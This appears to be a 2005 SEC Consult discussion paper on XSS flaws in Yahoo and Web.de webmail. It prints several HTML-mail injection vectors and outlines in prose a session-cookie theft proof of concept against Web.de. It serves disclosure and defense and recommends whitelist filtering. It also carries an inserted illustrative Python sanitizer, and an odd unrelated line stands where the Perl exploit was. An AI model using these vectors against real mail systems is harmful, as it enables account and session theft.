A Word on Webmail Security and Browser related XSS Bugs

SEC-CONSULT Security discussion paper 20051202-1

================================================================================

title: A Word on Webmail Security and Browser related XSS Bugs

program: Multiple Webmail Solutions

found: ---

by: SEC Consult Vulnerability Lab / www.sec-consult.com

affected vendors: Yahoo, Web.de

 

================================================================================

 

-----------

1. PREFACE:

-----------

 

As you all know, it is a tedious task to secure webmail services against

Cross Site Scripting attacks if they provide HTML email functionality.

 

Within the last few years a new type of XSS attack has emerged. The

combination of classic XSS and incorrect HTML parsing in several web browsers

(mostly MSIE) can lead to a dangerous situation for webmail systems as well as

other web applications. In particular, the insertion of non-printable characters

such as 0x00 or 0xff (but also many others) can be used to trigger such combined vulnerabilities.

 

Many vendors implement blacklist filters or other security measures, while

the root of the problem remains untouched. SEC Consult has been in touch with

various webmail vendors for quite some time, trying to make this point clear.

However, the situation has not changed as the security officers in charge do

not show much interest in the matter. The tenor of replies (if any) to our advisories

is that this is not a security issue or is impossible to exploit. Specific

Cross Site Scripting vectors do eventually get fixed quietly, but it is

a matter of minutes to find a new one.

 

In this security information, we will address fixed and unfixed Cross Site

Scripting flaws of large scale webmail providers to add some proof for our ongoing

allegations.

 

-----------------------------------------

2. LATEST XSS VECTORS FOR YAHOO'S WEBMAIL

-----------------------------------------

 

OUR LATEST YAHOO ADVISORY:

 

==========================================================

SEC-CONSULT Security Advisory 20051125-y8 Yahoo / MSIE XSS

==========================================================

 

Product: Yahoo Webmail in combination with MSIE 6.0(maybe other browsers)

Remarks: no other Versions tested but very likely vulnerable

 

Vulnerabilities: Multiple XSS/Cookie-Theft/Relogin-trojan

 

Vendor: Yahoo

Vendor-Status: first time vendor contacted (2005.09)

Vendor-Patches: patched in production environment

 

Object: MSIE (unknown version - 5.+)

 

Exploitable:

Local: ---

Remote: YES

Type: XSS - Cross Site Scripting - Cookie/Account Theft

 

============

Introduction

============

 

Yahoo-Webmail Vulnerability #8/2005

Followup for seclists.org/lists/bugtraq/2005/Oct/0263.html

 

=====================

Vulnerability Details

=====================

 

 

1) XSS / Cookie-Theft / Relogin Trojan

======================================

 

Yahoo's blacklists fail to detect script tags in combination with SPECIAL/META characters.

This leaves webmail users using MSIE vulnerable to typical XSS / Relogin-trojan attacks.

 

Vulnerable TAG/ATTRIBUTE

=========================

 

XML/DATASRC

 

 

Malicious HTML-Mail:

===========================================================================================================
XML-TAG / datasrc ATTRIBUTE:

---cut here---
<h1>Hola Seniores,</h1><br>\n<xml id=i><x><c><![CDATA[<img src="javas]]><![CDATA[cript:alert('Thank You ');
">]]></c></x></xml><span da[Some META-Char]tasrc=#i datafld=c dataformatas=html></span>
---cut here---
===========================================================================================================

 

===============

General remarks

===============

 

We would like to apologize in advance for potential nonconformities and/or known issues.

 

======================================

Recommended hotfixes for webmail-users

======================================

 

Do not use MS Internet-Explorer.

 

=================

Recommended fixes

=================

 

Do not use blacklists on tags and attributes. Whitelist special/meta-characters.

 

==============

Vendor-Patches

==============

 

vulnerability has been fixed in production environment.

 

 

 

 

.. and in addition some examples taken from our Yahoo webmail XSS Advisories from 2005.

================================================================================================
SCRIPT-TAG:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you now")</s[META-Char]cript></br>rrrrrrxxxxx<br>
---cut here---
================================================================================================
OBJECT-TAG:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie" value="http://[somewhere]/yahoo.swf"></obje[META-Char]ct>
---cut here---
================================================================================================
ONERROR-Attribute:
---cut here---
<img src="http://dontexist.info/x.jpg" one[META-Char]rror="alert('i have you now')">uargg</p>
---cut here---
================================================================================================
ONUNLOAD-Attribute:
---cut here---
</body><body onun[META-Char]load=alert('i have you now')><br></br><p>somewords</p></body></html>
---cut here---
================================================================================================

 

... many more to come :)

 

 

--------------------------------

3. EXPLOITING XSS FLAWS / WEB.DE

--------------------------------

 

Web.de is one of Germany's biggest webmail/freemail providers. Running JavaScript from HTML mails can be done by trivial

standard tricks; however, web.de claims to be unexploitable due to the security guards in place. Firstly, session validation

is based on three variables: the User-ID cookie, the user agent, and the random session ID which is passed along in every

URL. As a second security measure, HTML mails are loaded into their own frame from a different domain. This request is

validated with an encrypted one-time token. Obviously, this makes it more difficult to steal the main session

GerID, because the victim's browser prevents the attacker's JavaScript code from cross-domain scripting. Naturally, this

"protection" can be circumvented. In our proof of concept exploit, we first extract the original domain from document.referrer.

We then use this information to open the main website in an iframe and leverage one of many other Cross Site Scripting

flaws on web.de. This gives us access to frame[0], where we can extract the session ID from any link. We then extract

the User-ID cookie and user agent by standard means and pass them to our cookie logger, along with the session ID.

 

 

THE FIRST WEB.DE ADVISORY:

 

REMARK:

 

When we wrote the first advisory for web.de we thought it would be necessary to use a combination attack (browser bug + XSS).

After a while we found out that the same goals can be achieved without using special/meta characters.

 

===========================================================

SEC-CONSULT Security Advisory 20051125-w1 Web.de / MSIE XSS

===========================================================

 

Product: Web.de Freemail in combination with MSIE 6.0 (probably other browsers)

Remarks: no other versions tested but very likely vulnerable

 

Vulnerabilities: Multiple XSS/Cookie-Theft/Relogin-trojan

 

Vendor: Web.de (Part of United Internet)

Vendor-Status: first time vendor contacted (2005.08)

Vendor-Patches: unpatched (vendor does not consider XSS a vulnerability)

 

Object: MSIE (unknown version - 5.+ / other Browsers maybe affected too)

 

Exploitable:

Local: ---

Remote: YES

Type: XSS - Cross Site Scripting - Relogin Trojan - Cookie/Account Theft

 

============

Introduction

============

 

Web.de is one of the largest freemail providers in the German-speaking area.

Web.de - Webmail/Freemail Vulnerability #1/2005

 

=====================

Vulnerability Details

=====================

 

 

1) XSS / Cookie-Theft / Relogin Trojan

======================================

 

Web.de's blacklists fail to detect script tags in combination with SPECIAL/META characters.

This leaves Freemail users using MSIE (and most likely many other browsers) vulnerable to

typical XSS / Relogin-trojan attacks. The people from web.de try to hide their authentication

tokens in another subdomain, which is of course not a real security measure but much more

"security by obfuscation". Even if this precaution did prevent attackers from stealing session IDs

and cookies, it would never be sufficient against relogin-trojan attacks!

 

 

Vulnerable TAG/ATTRIBUTE

=========================

 

MANY (most likely every one that can be used to inject JavaScript/VBScript)

 

How to create a malicious HTML mail using Perl to exploit this vulnerability (this part of the advisory has

been modified for this discussion paper):

==============================================================================================================================

Milk is for babies. When you grow up you have to drink beer.

 

 

 

// if you are a security/jscript professional it's an easy task to get a readable plaintext version of this :-)

// please remove linefeeds for proper functionality

==============================================================================================================================

 

===============

General remarks

===============

 

We would like to apologize in advance for potential nonconformities and/or known issues.

 

======================================

Recommended hotfixes for webmail-users

======================================

 

Do not use web.de's freemail.

 

=================

Recommended fixes

=================

 

Do not use blacklists on tags and attributes. Whitelist special/meta-characters.

 

==============

Vendor-Patches

==============

 

Vulnerability has not been fixed in production environment.

 

Remark regarding our disclosure policies:

 

Normally SEC-Consult's disclosure policy forbids making vulnerabilities public before they are fixed.

 

In a couple of telephone calls, with a LETTER and many e-mails the people from web.de could not be

convinced that Cross Site Scripting is a security vulnerability. Since it is not very likely that

a fix will be made available soon we would like to inform the users of web.de about this serious issue.

 

----------------------------------------

4. RECOMMENDED FIXES FOR WEBMAIL VENDORS

----------------------------------------

 

You must employ whitelist filters. Meaning: Do not rely on filtering "script", "javascript" and specific exploits.

Deny HTML tags by default, then allow the basic required tags and validate each of them. SEC Consult and other security

professionals will not hesitate to give you free advice on how to implement this correctly.
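As an added illustration (not part of the original paper or any vendor's code) of the failure described in section 1 and the fix recommended here: a naive blacklist is run beside a deny-by-default whitelist sanitizer over constructed vectors in the style of the advisory's META-Char examples. 0x00 stands in for the meta character; the sample hostnames, the allowed-tag set and the helper names are assumptions.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed samples in the style of the advisory's vectors; 0x00 stands in for the "[META-Char]".
SAMPLES = [
    '<h1>hello</h1><s\x00cript>alert(1)</s\x00cript>',
    '<img src="http://example.invalid/x.jpg" one\x00rror="alert(1)">',
    '<a href="java\x00script:alert(1)">click</a>',
    '<b>plain <i>text</i></b> <a href="http://example.invalid/">link</a>',
]

# Blacklist approach the paper argues against: search the raw mail for known bad strings.
BLACKLIST = re.compile(r'<script|javascript:|\bon\w+\s*=', re.IGNORECASE)

def blacklist_blocks(html):
    return bool(BLACKLIST.search(html))  # True = this filter would reject the mail

# Whitelist approach the paper recommends: deny every tag by default, allow a few basic
# tags and validate the attributes each may carry (assumed allow-list, not a vendor's).
ALLOWED = {'b': set(), 'i': set(), 'p': set(), 'br': set(), 'h1': set(), 'a': {'href'}}
# Whitelist of characters: only tab/CR/LF, printable ASCII and non-control Unicode survive,
# so the filter parses the same tag names a tolerant browser would (no 0x00 inside "script").
NOT_PRINTABLE = re.compile(r'[^\t\n\r\x20-\x7e\xa0-\U0010ffff]')

class WhitelistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], False
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.skip = tag in ('script', 'style')  # drop their text content as well
            return
        kept = ''
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue
            if name == 'href' and not value.lower().startswith(('http://', 'https://')):
                continue  # only plain web links, never javascript:/vbscript:/data: URLs
            kept += f' {name}="{escape(value)}"'
        self.out.append(f'<{tag}{kept}>')
    def handle_endtag(self, tag):
        self.skip = False
        if tag in ALLOWED and tag != 'br':
            self.out.append(f'</{tag}>')
    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))  # text is re-escaped, never passed through raw

def whitelist_sanitize(html):
    parser = WhitelistSanitizer()
    parser.feed(NOT_PRINTABLE.sub('', html))
    parser.close()
    return ''.join(parser.out)  # rebuilt from allowed markup only
```

The three hostile samples pass the blacklist untouched, while the whitelist reduces them to harmless text and keeps the benign fourth sample intact.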

 

------------------

5. GENERAL REMARKS

------------------

 

We would like to apologize in advance for potential nonconformities and/or known issues.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

SEC Consult Unternehmensberatung GmbH

Office Vienna

Blindengasse 3

A-1080 Wien

Austria

 

Tel.: +43 / 1 / 409 0307 - 570

Fax.: +43 / 1 / 409 0307 - 590

Mail: office at sec-consult dot com

www.sec-consult.com

 

EOF SEC Consult Vulnerability Lab / @2005

research at sec-consult dot com